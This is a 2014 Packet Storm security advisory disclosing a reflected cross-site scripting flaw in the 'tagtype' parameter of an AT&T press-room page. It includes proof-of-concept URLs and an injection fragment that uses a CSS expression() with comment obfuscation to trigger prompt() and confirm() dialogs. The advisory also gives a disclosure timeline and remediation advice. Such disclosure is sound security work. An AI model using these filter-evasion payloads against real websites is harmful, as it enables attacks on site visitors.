AT&T Cross Site Scripting

2014-02-27T00:00:00
ID PACKETSTORM:125441
Type packetstorm
Reporter Nicholas Lemonias
Modified 2014-02-27T00:00:00

Description

                                        
                                            ` _____ .___ _________  
/ _ \ | |/ _____/  
/ /_\ \| |\_____ \  
/ | \ |/ \  
\____|__ /___/_______ /  
\/ \/ Corporation 2014 (c)  
  
Published Report: 27/02/2014  
  
  
Credits: Advanced Information Security Corporation, USA  
  
Severity: High/Critical (OWASP TOP 10)  
  
Type: Web Application / Cross-Site Scripting .  
CVSS: 7.0  
  
  
Author: Nicholas Lemonias. (Information Security Expert)  
  
  
Affected Domain  
=========================================================  
Domain: www.Att.com <http://www.att.com/> <http://www.att.com/> (AT&T  
Corporation) former  
American Telecommunication & Telegraph  
  
  
Background  
=========================================================  
AT&T Corp., originally the American Telephone and Telegraph Company, is the  
subsidiary of AT&T that provides voice, video, data, and Internet  
telecommunications and professional services to  
businesses, consumers, and government agencies. During its long history,  
AT&T was at times the world's largest telephone company, the world's  
largest cable television operator, and a regulated  
monopoly. At its peak in the 1950s and 1960s, it employed one million  
people and its revenue was roughly $300 billion annually in 2006.  
In 2005, AT&T was purchased by Baby Bell SBC Communications for more than  
$16 billion ($19.1 billion in present-day terms). SBC then rebranded itself  
as AT&T Inc.  
Today, AT&T Corporation continues to exist as the long distance subsidiary  
of AT&T Inc., and its name occasionally shows up in AT&T press releases.  
In 1880 the management of American Bell had created what would become AT&T  
Long Lines. The project was the first of its kind to create a nationwide  
long-distance network with a  
commercially viable cost-structure. The project was formally incorporated  
in New York State as a separate company named American Telephone and  
Telegraph Company on March 3, 1885.  
Starting from New York, its long-distance telephone network reached  
Chicago, Illinois, in 1892.  
  
  
Description  
=========================================================  
The problem concluded to reproduction of third-party heterogeneous code.   
  
  
  
Proof-Of-Concept 1  
=========================================================  
http://www.Att.com/gen/press-room?cdvn=news&newsfunction=  
tagresults&pid=20626&tagname=technology&tagtype=att'sTYLe%  
3d<http://www.att.com/gen/press-room?cdvn=news&newsfunction=tagresults&pid=20626&tagname=technology&tagtype=att'sTYLe%3d>  
'ccd:Expre%2f**%2fSSion(prompt(91233))'bad%3d'%3e&tier=TS_PROD<  
http://www.att.com/gen/press-room?cdvn=news&newsfunction=tagresults&pid=  
20626&tagname=technology&tagtype=att'sTYLe%3d'ccd:Expre%2f**%2fSSion(prompt(  
91233))'bad%3d'%3e&tier=TS_PROD>  
  
Description:  
The variable 'tagtype' is vulnerable to a reflected cross-site scripting.  
  
  
Injection Fragment:  
  
att'sTYLe='att:Expre/**/SSion(prompt(313371))'att='>  
  
  
Proof-of-Concept: 2  
=========================================================  
www.att.com/gen/press-room?cdvn=news&newsfunction=  
tagresults&pid=20626&tagname=technology&tagtype=att'sTYLe%  
3d<http://www.att.com/gen/press-room?cdvn=news&newsfunction=tagresults&pid=20626&tagname=technology&tagtype=att'sTYLe%3d>  
'att:Expre%2f**%2fSSion(confirm("xss"))'bad%3d'%3e&tier=TS_PROD  
  
Description: A confirmation window would prompt the user for a password.   
Defacement of the website could also occur through an 'Image  
onload event'  
e.g: IMG onload="JavaScriptCode".  
  
  
Responsible Disclosure Timeline  
=========================================================  
[+] 8th of August 2013 - Vendor communication.  
  
[+] 8th of August 2013 - Vendor acknowledgement of the problem.  
  
[+] 11th of August 2013 - Feedback request on remediation procedures.  
  
[+] 9th of December 2013 - Problem Mitigation.  
  
[+] 27th of February, 2014 - Public Notification  
  
  
Recommendations for QoS and Security Compliance  
=========================================================  
The recommendations made to AT&T Corp were therefore:  
To consider encrypting the view state of the application.  
Furthermore to  
implement a stronger Cross-Site Scripting protection.  
Apparently XSS filtering is not properly applied, and meta-character  
filtering allowed data input over the HTTP protocol to inject third-party  
untrusted code, in JavaScript, Active-X and Visual Basic Script.  
Please note that malicious users could take advantage of such instances, as  
we have seen in malware and virus propagation instances - with a severe  
impact  
to systems of strategic and political importance.  
  
  
Our consultation to AT&T Corp, has therefore been, for a full and urgent  
security risk assessment, as outlined in (ISO/IEC 27001), (ISO/IEC 27002),  
and (ISO/IEC 27005), and the effective enumeration and revisitation of upper-level  
security policies.  
  
  
Dissemination of threats are often gathered in the form of a hyperlink,  
either through an e-mail message, social networking websites, forums and  
other online sources. A malicious adversary could take advantage of this  
vulnerability, for:   
a. the mass exploitation of unsuspected users, through malware and virus  
propagation instances. A malicious user could take advantage of defects in the  
encoding methods, so that the propagation is further obfuscated.  
  
  
Appendices  
=========================================================  
A. We consulted AT&T Corp to consider the filtering of meta-characters.  
B. We consulted AT&T for a comprehensive review of   
server-level encoding of application output.  
  
  
References  
=========================================================  
[1] OWASP. 2013. Cross Site Scripting (XSS) attacks, [ONLINE]  
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS), 2011  
  
[2] OWASP. 2013. XSS Filter Evasion Cheat-Sheet, [ONLINE]  
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet?, 2013.  
  
[3] Microsoft. 2011. Protecting against XSS attacks. [ONLINE] Available at:  
http://msdn.microsoft.com/en-us/library/ff649310.aspx.  
  
  
  
  
  
** This vulnerability report is posted for the wider benefit of the  
security community, as is and without any warranties, including the  
warranty of merchantability and capability fit for a particular purpose.  
The information is posted under the FOI as per best security practice.  
  
  
  
  
[Copyright Advanced Information Security Corp (c), 2014]`